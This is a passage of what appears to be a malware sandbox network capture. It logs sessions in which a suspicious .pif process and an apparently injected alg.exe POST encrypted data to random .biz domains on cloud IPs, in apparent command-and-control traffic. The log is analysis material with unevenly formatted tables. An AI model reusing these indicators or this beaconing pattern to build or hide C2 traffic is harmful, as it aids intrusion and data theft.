    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
73          192.168.2.8  49789        34.211.97.45    80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:18.331059933 CET  350                OUT        POST /klflkg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vrrazpdh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:24:18.331089020 CET  802                OUT        Data Raw: c5 26 4b f1 ee 9b 58 c6 16 03 00 00 bd 56 09 7e 0d 42 57 02 31 b5 f4 ee de 30 55 a6 90 c4 d1 20 28 9d 85 99 d8 c0 b8 5b e2 df a2 f6 cf 05 22 c5 d5 e0 98 eb ad f2 f6 6a d9 11 e0 1d 63 57 a3 ca 65 6a 42 3f c1 e5 31 f5 43 70 19 3c f1 17 a9 7f 74 e4


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
74          192.168.2.8  49790        34.211.97.45    80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:19.070873976 CET  356                OUT        POST /cisadtlsyrfn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vrrazpdh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:24:19.070909023 CET  802                OUT        Data Raw: fb 3b c2 c9 91 90 bf 20 16 03 00 00 00 02 a0 b2 38 18 75 48 ad 97 2b 05 1a 99 e3 d4 bb 09 e5 63 18 ce 94 b1 51 8d 38 f0 61 98 95 0c d4 bd d3 a9 52 22 1f 4d 03 2a 09 84 1a c9 5c 26 1f dd 0b c6 f5 04 38 f9 18 9c 63 5b 9d 9f 8a f1 09 07 58 e7 e9 1c
Nov 1, 2024 08:24:19.911938906 CET  416  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=be122e45ecf6c53c17f9ad2968cbf282|173.254.250.82|1730445859|1730445859|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
75          192.168.2.8  49791        208.100.26.245  80                4916  C:\Windows\System32\alg.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:19.567832947 CET  344                OUT        POST /y HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yunalwv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 1, 2024 08:24:19.574242115 CET  778                OUT        Data Raw: 6f a2 07 4b d8 18 ce b5 fe 02 00 00 fb b2 ac f0 31 d7 4e d9 89 1d e0 cf 57 9f 2c c2 1c c4 7a 6c 4f 6b cc f7 c8 16 da 65 8d 36 9c 0f 6f 25 48 bc be ee 66 e6 72 36 cd 7b a7 9f a8 cd 8f 6c 7a 0c fe 2c eb de 4b 1c f9 e3 c5 d6 ac f0 26 83 b2 0e 35 a8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: oK1NW,zlOke6o%Hfr6{lz,K&5RVD3gqD:('EoZ'/N[e9_0.:GQ47T$G%YcM-9[;I=FA'7%hGzV*{LP88@9e^Wb":7
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.213001966 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 1, 2024 08:24:20.263045073 CET | 356 | OUT | POST /cjqgdtkxtfqqm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:20.263072968 CET | 778 | OUT | Data Raw: cc 54 f5 53 a9 c4 c9 a9 fe 02 00 00 af 81 34 f1 e5 0a ad cf e2 3e 82 c5 73 15 1a 3b 7a 6c 0d 94 09 eb 90 e7 6e 4b fa c8 c0 af a4 b9 9e 19 fb 0e 89 bd 68 b5 57 33 51 61 0d 9f a4 be dd 26 82 85 17 ff b0 29 28 04 7b 50 df 83 a5 40 6a 88 e4 3e 92 17
Data Ascii: TS4>s;zlnKhW3Qa&)({P@j>fAq!k _abToKn5DD6:<q$N0F/SgjHrMN1_9#DHo0mB`it0+
Nov 1, 2024 08:24:20.410424948 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 01 Nov 2024 07:24:20 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.8 | 49792 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:19.964059114 CET | 350 | OUT | POST /xymnprgj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:19.964102983 CET | 802 | OUT | Data Raw: 4b 42 f4 c8 82 e4 7c 2c 16 03 00 00 dc 30 1b e7 59 33 77 bb 32 66 02 14 3a 2f 34 81 61 80 3b 96 b8 ed 6d 81 4a 22 8d 89 a9 5a 3c 2b b3 9c 72 d2 62 ef c8 bb 17 c2 95 05 96 52 70 f2 89 d4 26 db d2 00 37 ec fe f5 21 7e 06 ac 03 4e b5 06 ff 13 a4 06
Data Ascii: KB|,0Y3w2f:/4a;mJ"Z<+rbRp&7!~N#w}{C!5CXK~%<8jR,z_#r0P=c!DeUtc3<J\`s{y.w_=<`<
Nov 1, 2024 08:24:21.432513952 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d517416f8a2c7e0857a3113cd763f27b|173.254.250.82|1730445861|1730445861|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        77192.168.2.84979334.211.97.45804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET352OUTPOST /hmiutucdfnn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET778OUTData Raw: ad ca 0a 71 f5 b2 51 df fe 02 00 00 ad 0e ee 8d 76 19 43 5f 48 96 4c e0 d9 bf 4b f0 72 87 6c 46 fb 9e 83 bb be 3b 43 8b 31 57 2b 9c d0 cd df d4 f3 b3 17 02 ce 22 72 fd a1 64 88 88 eb 96 6e e8 37 4b a1 f0 12 c2 e5 bf 05 4c 8d 03 01 38 b5 99 d3 b4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qQvC_HLKrlF;C1W+"rdn7KL8G;`i\qS+K,n;nb|::Wgt8sr*a3R1Vk}al<1dZ$!iSo}x|Db?'sS\"
Nov 1, 2024 08:24:21.385570049 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=eebb9762fc28126f3fd3940a32f565cc|173.254.250.82|1730445861|1730445861|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.8 | 49794 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:21.477569103 CET | 347 | OUT | POST /yhjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:21.477596998 CET | 802 | OUT | Data Raw: 33 de f7 ce 92 5c ee dc 16 03 00 00 24 a7 31 8a b9 93 ed a4 58 91 82 92 1f 2a 57 85 6e 26 e5 06 0b e8 31 4a 25 4c 51 f3 42 dd 2a ee 69 c6 2f 0a 50 c4 a6 f6 c5 26 d4 fd 20 4a 32 5e c4 a4 b3 d9 01 95 4a 0a 63 97 39 ed be 4a df f3 8b 75 18 06 87 3d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3\$1X*Wn&1J%LQB*i/P& J2^Jc9Ju=!=q6"`M.uWKu,0>d`6/^B3CcVeW3!n[Z^lqDo0s7wSl!Y\xE#<DZU1{jIqo\'qo?Uh#6B_%asXb
Nov 1, 2024 08:24:22.918073893 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=402579d32a4affc3639b391fe963b50a|173.254.250.82|1730445862|1730445862|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.8 | 49795 | 54.244.188.177 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:21.492954969 CET | 346 | OUT | POST /om HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:21.493026018 CET | 778 | OUT | Data Raw: ec 0a 10 cd 59 de 81 f1 fe 02 00 00 f7 1c 26 73 6a 4e f1 89 9e 82 2b e4 f9 10 41 7d 2c 4b f5 07 d5 b6 5d e2 37 d6 5d 44 00 59 d2 92 3b 3b de 8e 4a fe 97 3e da 90 bb 0d 71 1c 89 8c 31 2f 91 d6 9d 3e 4a 63 d0 b2 9b 38 87 8b 7d 08 9a c0 2f 09 30 4d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y&sjN+A},K]7]DY;;J>q1/>Jc8}/0M@g8W.3-l% !Y0e8`fFnZx}pWlL(hf![qcKx1@*%o5U~D~?)T37OO$iPHk0-P>o_[a
Nov 1, 2024 08:24:22.326581955 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ad2b355a82aa7588a7ee9e6bfec90bb1|173.254.250.82|1730445862|1730445862|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.8 | 49796 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:22.600342989 CET | 346 | OUT | POST /gho HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:22.600387096 CET | 778 | OUT | Data Raw: a8 47 f1 92 48 0b ff 9a fe 02 00 00 e9 5c 04 5e 0c 9a 9a 38 59 ce 69 0e 88 bb b3 28 ff 66 97 4c cc ea 2e ff 9e 2a 97 f4 bd eb 07 90 ba 3a ef 7e 97 48 6e 72 f0 d7 e3 9f 42 48 4a c9 ff 0b 05 c1 43 c6 bd 07 04 4c a9 b0 92 01 ca 6b f3 a3 31 69 21 9a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GH\^8Yi(fL.*:~HnrBHJCLk1i!aBVAFD[lPpHOa5}a( Hw9#b{_qs7Emp3fUyL3h:Ox#(hzn'z6T,*dmE2*rQ!;y9Ux
Nov 1, 2024 08:24:24.035419941 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a0fed0111d370b8003f1b6ed1b538aaa|173.254.250.82|1730445863|1730445863|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.8 | 49797 | 34.211.97.45 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:23.143762112 CET | 348 | OUT | POST /ulgmbpj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:23.143785954 CET | 802 | OUT | Data Raw: (binary payload)
Nov 1, 2024 08:24:23.967966080 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7363f3a8700c1ff50daa9751734b02ae|173.254.250.82|1730445863|1730445863|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.8 | 49798 | 3.94.10.34 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:24.011464119 CET | 349 | OUT | POST /leqj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:24.011483908 CET | 802 | OUT | Data Raw: (binary payload)
Nov 1, 2024 08:24:24.670476913 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=00239e451e832b67d2779fcaa1cb1e7e|173.254.250.82|1730445864|1730445864|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.8 | 49799 | 18.208.156.248 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:24.210942984 CET | 353 | OUT | POST /ixcnnbyrmpnn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:24.210972071 CET | 778 | OUT | Data Raw: (binary payload)
Nov 1, 2024 08:24:24.889277935 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a18a9f10b7ee33b3ca25271258b08901|173.254.250.82|1730445864|1730445864|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.8 | 49800 | 18.246.231.120 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:24.716382027 CET | 353 | OUT | POST /iuqfwfkapu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:24.716408968 CET | 802 | OUT | Data Raw: e9 e9 30 75 8c ff 2e fb 16 03 00 00 55 be 66 48 42 0e 66 4c 7c 13 3a 56 0f 48 92 21 53 e6 c8 07 12 81 87 73 64 05 79 94 11 32 5c df cf d6 5f 62 9a 11 21 e5 a5 69 80 2f bf ff f9 e1 7c 97 db 9a ba c8 99 ce 1a 7a 22 52 d2 a5 b8 c7 1f bf e1 9f b2 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0u.UfHBfL|:VH!Ssdy2\_b!i/|z"R6LZG>Xw/,t4C.#ASq,t!p]DrM^6DHHy>*vabZT$)bRAo,w6<r6\VwzOB8Y,to=[:km[t4h'
Nov 1, 2024 08:24:25.548032045 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
